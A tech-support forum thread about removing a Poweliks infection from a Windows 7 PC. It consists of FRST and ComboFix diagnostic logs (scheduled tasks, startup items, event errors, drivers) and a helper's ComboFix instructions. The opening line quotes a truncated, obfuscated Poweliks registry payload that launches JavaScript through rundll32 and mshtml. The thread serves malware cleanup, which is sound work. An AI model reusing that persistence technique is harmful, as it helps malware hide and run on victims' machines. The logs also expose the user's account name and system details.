CustomCLSID: HKU\S-1-5-21-1721771813-3942891954-2793525010-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points =========================

26-10-2014 22:10:40 Scheduled Checkpoint
27-10-2014 07:47:54 avast! antivirus system restore point
27-10-2014 07:53:09 Removed GeekBuddy.
27-10-2014 08:32:06 Removed ebi.BookReader3J

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2014-10-21 00:12 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {38B69515-75EE-45F7-AADF-BA4ECB7497EC} - System32\Tasks\Game_Booster_AutoUpdate => C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe
Task: {4F7521E0-5030-4229-81A9-3C590C28B238} - System32\Tasks\ASUS\ASUS Update Checker => C:\Program Files (x86)\ASUS\ASUSUpdate\UpdateChecker\UpdateChecker.exe [2009-12-28] (ASUSTeK Computer Inc.)
Task: {5527822D-B79C-407A-A90B-8726D2CC0D34} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.)
Task: {5DC93231-81D9-4BA6-9F03-8C1A0A73223B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-10-23] (Piriform Ltd)
Task: {AD27FE19-DD71-4A43-8B11-5116A7CE348F} - System32\Tasks\ASUS\ASUS RegRun Loader => C:\Program Files (x86)\ASUS\AASP\1.00.97\AsLoader.exe [2009-12-23] (ASUSTeK Computer Inc.)
Task: {B20A35D4-ADE1-4EAD-9C5E-5C68779655B7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.)
Task: {DAF6AA24-3111-4D7D-BA1C-EB27CF111CC9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-10-20] (Adobe Systems Incorporated)
Task: {DFC4F727-6E50-455B-A97E-BC10E69CFFE0} - System32\Tasks\{512B4F1F-A37C-4F6C-8D18-466D7A964A4D} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2014-07-24] (Skype Technologies S.A.)
Task: {F82B5156-20D3-41D7-B836-D98942D48ABA} - System32\Tasks\ASUS\AsBackupWizard_Run => C:\Program Files (x86)\ASUS\AsBackupWizard\AsRunBkWizardHelper.exe [2010-04-23] (ASUSTeK Computer Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2011-06-14 23:02 - 2008-11-11 05:23 - 00027648 _____ () C:\Windows\System32\sso2ml6.dll
2013-03-14 09:38 - 2012-03-21 06:48 - 00184320 _____ () C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:5C321E34
AlternateDataStreams: C:\ProgramData\TEMP:F25DDE13
AlternateDataStreams: C:\Users\McLain\Local Settings:f086wSl4AGfGJDPZoQwtRUAX3
AlternateDataStreams: C:\Users\McLain\AppData\Local:f086wSl4AGfGJDPZoQwtRUAX3
AlternateDataStreams: C:\Users\McLain\AppData\Local\Application Data:f086wSl4AGfGJDPZoQwtRUAX3

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: Device Handle Service => 2
MSCONFIG\Services: GeekBuddyRSP => 2
MSCONFIG\Services: jswpsapi => 3
MSCONFIG\Services: RalinkRegistryWriter => 2
MSCONFIG\Services: RealtekSE => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ASUS PCE-N53 WLAN Control Center.lnk => C:\Windows\pss\ASUS PCE-N53 WLAN Control Center.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^NETGEAR WN111v2 Smart Wizard.lnk => C:\Windows\pss\NETGEAR WN111v2 Smart Wizard.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start GeekBuddy.lnk => C:\Windows\pss\Start GeekBuddy.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS6ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: HDAudDeck => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
MSCONFIG\startupreg: Logitech Download Assistant => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RunAIShell => C:\Program Files (x86)\ASUS\AI Manager\AsShellApplication.exe
MSCONFIG\startupreg: SansaDispatch => C:\Users\McLain\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
MSCONFIG\startupreg: tvncontrol => "C:\Program Files (x86)\Common Files\COMODO\GeekBuddyRSP.exe" -controlservice -slave

========================= Accounts: ==========================

Administrator (S-1-5-21-1721771813-3942891954-2793525010-500 - Administrator - Disabled)
Guest (S-1-5-21-1721771813-3942891954-2793525010-501 - Limited - Disabled)
McLain (S-1-5-21-1721771813-3942891954-2793525010-1001 - Administrator - Enabled) => C:\Users\McLain

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description: The index cannot be initialized.

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: The application cannot be initialized.

Context: Windows Application

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: The gatherer object cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.TripoliIndexer> cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
   Element not found. (HRESULT : 0x80070490) (0x80070490)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.JetPropStore> cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 9002) (User: )
Description: The Windows Search Service cannot load the property store information.

Context: Windows Application, SystemIndex Catalog

Details:
   The content index database is corrupt. (HRESULT : 0xc0041800) (0xc0041800)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: The Windows Search Service is being stopped because there is a problem with the indexer: The catalog is corrupt.

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description: The search service has detected corrupted data files in the index {id=4700}. The service will attempt to automatically correct this problem by rebuilding the index.

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 9000) (User: )
Description: The Windows Search Service cannot open the Jet property store.

Details:
   0x%08x (0xc0041800 - The content index database is corrupt. (HRESULT : 0xc0041800))

Error: (10/27/2014 01:51:03 AM) (Source: ESENT) (EventID: 455) (User: )
Description: Windows (3136) Windows: Error -1811 occurred while opening logfile C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS0055C.log.

System errors:
=============
Error: (10/27/2014 01:51:43 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/27/2014 01:51:04 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (10/27/2014 01:51:04 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Windows Search service terminated with service-specific error %%-1073473535.

Error: (10/27/2014 01:50:50 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error:
%%20

Error: (10/27/2014 01:03:11 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/27/2014 01:02:06 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error:
%%20

Error: (10/27/2014 00:44:13 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/27/2014 00:42:53 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error:
%%20

Error: (10/26/2014 04:10:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/26/2014 02:10:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error:
%%20

Microsoft Office Sessions:
=========================
Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description:
Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: Context: Windows Application

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
   Element not found. (HRESULT : 0x80070490) (0x80070490)
Search.TripoliIndexer

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Search.JetPropStore

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 9002) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
   The content index database is corrupt. (HRESULT : 0xc0041800) (0xc0041800)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description:
Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
The catalog is corrupt

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description:
Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
4700

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 9000) (User: )
Description:
Details:
   0x%08x (0xc0041800 - The content index database is corrupt. (HRESULT : 0xc0041800))

Error: (10/27/2014 01:51:03 AM) (Source: ESENT) (EventID: 455) (User: )
Description: Windows3136Windows: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS0055C.log-1811

CodeIntegrity Errors:
===================================
Date: 2014-10-21 00:09:13.516
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-21 00:09:13.235
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: AMD Phenom II X4 830 Processor
Percentage of memory in use: 28%
Total physical RAM: 5887.18 MB
Available physical RAM: 4198.36 MB
Total Pagefile: 11772.53 MB
Available Pagefile: 9686.27 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: (WIN7) (Fixed) (Total:917.33 GB) (Free:163.1 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: CB5BD2B2)
Partition 1: (Not Active) - (Size=14.2 GB) - (Type=1B)
Partition 2: (Active) - (Size=917.3 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Naathim · October 27, 2014

Hi

You are another victim of Poweliks infection.

Scan with ComboFix

This is a very powerful tool that should be used only if advised by Malware Analyst.
Do not run ComboFix on your own!

Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.
If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

Right-click on icon and select Run as Administrator to start the tool.
Accept the disclaimer and agree if prompted to install Recovery Console.
Do not take any actions while ComboFix goes through your System - it may cause it to stall!
This scan may take some time!
When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.
If you'll encounter any issues with internet connection after running ComboFix, please visit this link.
If an error about operation on the key marked for deletion will appear after running the tool, please reboot your machine.
Don't forget to re-enable your previously switched-off protection software!

bmclain · October 27, 2014

ComboFix 14-10-27.01 - McLain 10/27/2014   6:50.6.4 - x64
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.5887.4639 [GMT -7:00]
Running from: c:\users\McLain\Downloads\ComboFix.exe
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\McLain\videos\ccsetup419.exe
c:\users\McLain\videos\cfw_installer_5732_83.exe
c:\users\McLain\videos\ChromeSetup.exe
c:\users\McLain\videos\JRT.exe
c:\users\McLain\videos\spywareblastersetup50.exe
c:\users\McLain\videos\zafwSetupWeb_133_209_000.exe
c:\windows\SysWow64\ijl11.dll
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
    (Default)    REG_SZ    Thumbnail Cache Class Factory for Out of Proc Server
    AppID    REG_SZ    {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32
    (Default)    REG_SZ    c:\windows\system32\thumbcache.dll
    ThreadingModel    REG_SZ    Apartment
.
.
(((((((((((((((((((((((((   Files Created from 2014-09-27 to 2014-10-27 )))))))))))))))))))))))))))))))
.
.
2014-10-27 14:00 . 2014-10-27 14:00   --------   d-----w-   c:\users\LogMeInRemoteUser\AppData\Local\temp
2014-10-27 14:00 . 2014-10-27 14:00   --------   d-----w-   c:\users\Default\AppData\Local\temp
2014-10-27 07:33 . 2014-10-27 09:06   --------   d-----w-   C:\FRST
2014-10-27 05:39 . 2014-10-27 05:39   --------   d-----w-   c:\programdata\CheckPoint
2014-10-25 08:53 . 2014-10-25 08:53   --------   d-----w-   c:\programdata\Licenses
2014-10-25 08:47 . 2014-10-25 08:47   1060864   ----a-w-   c:\windows\SysWow64\mfc71.dll
2014-10-25 08:47 . 2014-10-25 08:47   1700352   ----a-w-   c:\windows\SysWow64\gdiplus.dll
2014-10-25 08:45 . 2014-10-26 21:11   --------   d-----w-   c:\program files\COMODO
2014-10-25 08:45 . 2014-10-25 08:47   --------   d-----w-   c:\program files (x86)\Comodo
2014-10-25 08:42 . 2014-10-26 21:11   --------   d-----w-   c:\programdata\Comodo
2014-10-25 07:24 . 2014-10-25 07:24   --------   d-----w-   c:\windows\ERUNT
2014-10-24 11:06 . 2014-09-19 01:18   940032   ----a-w-   c:\windows\system32\MsSpellCheckingFacility.exe
2014-10-24 10:48 . 2014-08-29 02:07   3179520   ----a-w-   c:\windows\system32\rdpcorets.dll
2014-10-24 10:48 . 2014-05-08 09:32   16384   ----a-w-   c:\windows\system32\RdpGroupPolicyExtension.dll
2014-10-24 10:43 . 2014-10-14 19:59   11627712   ----a-w-   c:\programdata\Microsoft\Windows Defender\Definition Updates\{B61B5D38-0B3F-4262-9B81-21F3A412CD28}\mpengine.dll
2014-10-24 10:42 . 2014-09-05 01:52   5703168   ----a-w-   c:\windows\SysWow64\mstscax.dll
2014-10-24 10:42 . 2014-09-05 02:11   6584320   ----a-w-   c:\windows\system32\mstscax.dll
2014-10-24 07:03 . 2014-10-24 07:03   194048   ----a-w-   c:\windows\SysWow64\elshyph.dll
2014-10-24 06:56 . 2012-08-23 14:10   19456   ----a-w-   c:\windows\system32\drivers\rdpvideominiport.sys
2014-10-24 06:56 . 2012-08-23 14:13   243200   ----a-w-   c:\windows\system32\rdpudd.dll
2014-10-24 06:56 . 2012-08-23 11:12   192000   ----a-w-   c:\windows\SysWow64\rdpendp_winip.dll
2014-10-24 06:56 . 2012-08-23 10:51   228864   ----a-w-   c:\windows\system32\rdpendp_winip.dll
2014-10-24 06:52 . 2014-10-24 06:52   --------   d-----w-   c:\program files\Microsoft Silverlight
2014-10-24 06:52 . 2014-10-24 06:52   --------   d-----w-   c:\program files (x86)\Microsoft Silverlight
2014-10-21 04:51 . 2014-10-25 07:10   --------   d-----w-   C:\AdwCleaner
2014-10-19 19:12 . 2014-10-27 08:51   129752   ----a-w-   c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-19 19:11 . 2014-10-21 04:28   92888   ----a-w-   c:\windows\system32\drivers\mbamchameleon.sys
2014-10-19 19:11 . 2014-10-19 19:11   --------   d-----w-   c:\program files (x86)\Malwarebytes Anti-Malware
2014-10-19 19:11 . 2014-10-01 18:11   63704   ----a-w-   c:\windows\system32\drivers\mwac.sys
2014-10-19 19:11 . 2014-10-01 18:11   25816   ----a-w-   c:\windows\system32\drivers\mbam.sys
2014-10-19 08:46 . 2014-10-21 04:50   --------   d-----w-   c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-10-19 06:12 . 2014-10-19 06:12   --------   d-----w-   c:\users\McLain\AppData\Roaming\WinPatrol
2014-10-16 16:12 . 2014-09-29 00:58   3198976   ----a-w-   c:\windows\system32\win32k.sys
2014-10-16 16:12 . 2014-06-18 22:23   73880   ----a-w-   c:\windows\system32\mscories.dll
2014-10-16 16:12 . 2014-06-18 22:23   1943696   ----a-w-   c:\windows\system32\dfshim.dll
2014-10-16 16:12 . 2014-06-18 22:23   156312   ----a-w-   c:\windows\system32\mscorier.dll
2014-10-16 16:12 . 2014-06-18 22:23   81560   ----a-w-   c:\windows\SysWow64\mscories.dll
2014-10-16 16:12 . 2014-06-18 22:23   156824   ----a-w-   c:\windows\SysWow64\mscorier.dll
2014-10-16 16:12 . 2014-06-18 22:23   1131664   ----a-w-   c:\windows\SysWow64\dfshim.dll
2014-10-04 20:45 . 2014-10-23 18:58   --------   d-----w-   c:\users\McLain\AppData\Roaming\CDisplayEx
2014-10-04 20:45 . 2014-10-04 20:45   --------   d-----w-   c:\program files\CDisplayEx
2014-10-01 19:22 . 2014-09-25 02:08   371712   ----a-w-   c:\windows\system32\qdvd.dll
2014-10-01 19:22 . 2014-09-25 01:40   519680   ----a-w-   c:\windows\SysWow64\qdvd.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-10-20 08:15 . 2012-10-11 17:33   701104   ----a-w-   c:\windows\SysWow64\FlashPlayerApp.exe
2014-10-20 08:15 . 2011-05-16 14:14   71344   ----a-w-   c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-10-17 10:00 . 2011-06-26 02:14   103265616   ----a-w-   c:\windows\system32\MRT.exe
2014-10-02 22:53 . 2011-08-28 18:00   278152   ------w-   c:\windows\system32\MpSigStub.exe
2014-09-09 22:11 . 2014-09-24 15:45   2048   ----a-w-   c:\windows\system32\tzres.dll
2014-09-09 21:47 . 2014-09-24 15:45   2048   ----a-w-   c:\windows\SysWow64\tzres.dll
2014-08-29 18:41 . 2012-07-17 21:37   23256   ----a-w-   c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-23 02:07 . 2014-08-28 08:57   404480   ----a-w-   c:\windows\system32\gdi32.dll
2014-08-23 01:45 . 2014-08-28 08:57   311808   ----a-w-   c:\windows\SysWow64\gdi32.dll
2014-08-01 11:53 . 2014-09-12 01:24   1031168   ----a-w-   c:\windows\system32\TSWorkspace.dll
2014-08-01 11:35 . 2014-09-12 01:24   793600   ----a-w-   c:\windows\SysWow64\TSWorkspace.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
R2 ASUSWireless;ASUSWireless;c:\program files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe;c:\program files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 ahcix64s;ahcix64s;c:\windows\system32\DRIVERS\ahcix64s.sys;c:\windows\SYSNATIVE\DRIVERS\ahcix64s.sys [x]
R3 BazisVirtualCDBus;WinCDEmu Virtual Bus Driver;c:\windows\system32\DRIVERS\BazisVirtualCDBus.sys;c:\windows\SYSNATIVE\DRIVERS\BazisVirtualCDBus.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 Leapfrog-USBLAN;Leapfrog-USBLAN;c:\windows\system32\DRIVERS\btblan.sys;c:\windows\SYSNATIVE\DRIVERS\btblan.sys [x]
R3 netr28x;Ralink 802.11n Extensible Wireless Driver;c:\windows\system32\DRIVERS\netr28x.sys;c:\windows\SYSNATIVE\DRIVERS\netr28x.sys [x]
R3 PCAMp50a64;PCAMp50a64 NDIS Protocol Driver;c:\windows\system32\Drivers\PCAMp50a64.sys;c:\windows\SYSNATIVE\Drivers\PCAMp50a64.sys [x]
R3 PCASp50a64;PCASp50a64 NDIS Protocol Driver;c:\windows\system32\Drivers\PCASp50a64.sys;c:\windows\SYSNATIVE\Drivers\PCASp50a64.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RTL8192Ce;Realtek Wireless LAN 802.11n PCI-E NIC Driver;c:\windows\system32\DRIVERS\rtl8192Ce.sys;c:\windows\SYSNATIVE\DRIVERS\rtl8192Ce.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 WinRing0_1_2_0;WinRing0_1_2_0;c:\program files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys;c:\program files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [x]
R3 WN111v2;NETGEAR WN111v2 USB2.0 Wireless Card Service;c:\windows\system32\DRIVERS\WN111v2w7x.sys;c:\windows\SYSNATIVE\DRIVERS\WN111v2w7x.sys [x]
R4 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
R4 Device Handle Service;Device Handle Service;c:\windows\SysWOW64\AsHookDevice.exe;c:\windows\SysWOW64\AsHookDevice.exe [x]
R4 jswpsapi;Jumpstart Wifi Protected Setup;c:\program files (x86)\NETGEAR\WN111v2\jswpsapi.exe;c:\program files (x86)\NETGEAR\WN111v2\jswpsapi.exe [x]
R4 RealtekSE;RealtekSE;c:\program files (x86)\ASUS\PCE-N10 WLAN Card Utilities\RtlService.exe;c:\program files (x86)\ASUS\PCE-N10 WLAN Card Utilities\RtlService.exe [x]
S0 gfibto;gfibto;c:\windows\system32\drivers\gfibto.sys;c:\windows\SYSNATIVE\drivers\gfibto.sys [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S1 AsUpIO;AsUpIO;SysWow64\drivers\AsUpIO.sys;SysWow64\drivers\AsUpIO.sys [x]
S1 JSWPSLWF;JumpStart Wireless Filter Driver;c:\windows\system32\DRIVERS\jswpslwfx.sys;c:\windows\SYSNATIVE\DRIVERS\jswpslwfx.sys [x]
S2 c2cautoupdatesvc;Skype Click to Call Updater;c:\program files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe;c:\program files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [x]
S2 c2cpnrsvc;Skype Click to Call PNR Service;c:\program files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe;c:\program files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [x]
S2 cvhsvc;Client Virtualization Handler;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE [x]
S2 sftlist;Application Virtualization Client;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe [x]
S2 SSPORT;SSPORT;c:\windows\system32\Drivers\SSPORT.sys;c:\windows\SYSNATIVE\Drivers\SSPORT.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
S3 Sftfs;Sftfs;c:\windows\system32\DRIVERS\Sftfslh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftfslh.sys [x]
S3 Sftplay;Sftplay;c:\windows\system32\DRIVERS\Sftplaylh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftplaylh.sys [x]
S3 Sftredir;Sftredir;c:\windows\system32\DRIVERS\Sftredirlh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftredirlh.sys [x]
S3 Sftvol;Sftvol;c:\windows\system32\DRIVERS\Sftvollh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftvollh.sys [x]
